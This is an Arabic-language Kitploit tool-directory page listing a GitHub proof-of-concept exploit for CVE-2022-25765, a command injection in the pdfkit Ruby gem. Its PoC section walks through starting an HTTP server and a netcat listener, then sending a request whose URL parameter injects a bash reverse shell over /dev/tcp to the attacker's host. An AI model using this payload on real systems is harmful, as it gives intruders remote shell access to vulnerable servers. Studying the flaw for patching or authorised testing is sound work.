Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PDFkit-CMD-Injection — إثبات مفهوم لاستغلال CVE-2022-25765 يوضح حقن الأوامر في pdfkit 0.8.6 عبر معامل URL غير مُنقّى، مما يتيح تنفيذ الأكواد عن بُعد وفتح قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/lekosbelas/pdfkit-cmd-injection
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرة
GitHublekosbelas/pdfkit-cmd-injection

PDFkit-CMD-Injection

إثبات مفهوم لاستغلال CVE-2022-25765 يوضح حقن الأوامر في pdfkit 0.8.6 عبر معامل URL غير مُنقّى، مما يتيح تنفيذ الأكواد عن بُعد وفتح قشرة عكسية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
12منذ 3 سنواتلم تتم المراجعة بعد
مشاركة

PDFkit-CMD-Injection

تفاصيل CVE-2022-25765

الوصف

حزمة pdfkit منذ الإصدار 0.0.0 معرضة لثغرة حقن الأوامر، حيث لا يتم تنقية عنوان URL بشكل صحيح.

PoC

ابدأ خادم HTTP

1- python3 -m http.server 80

ابدأ مستمع netcat

2- nc -lnvp 'Target Port'

أرسل طلبًا

3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}
تنزيل الأداة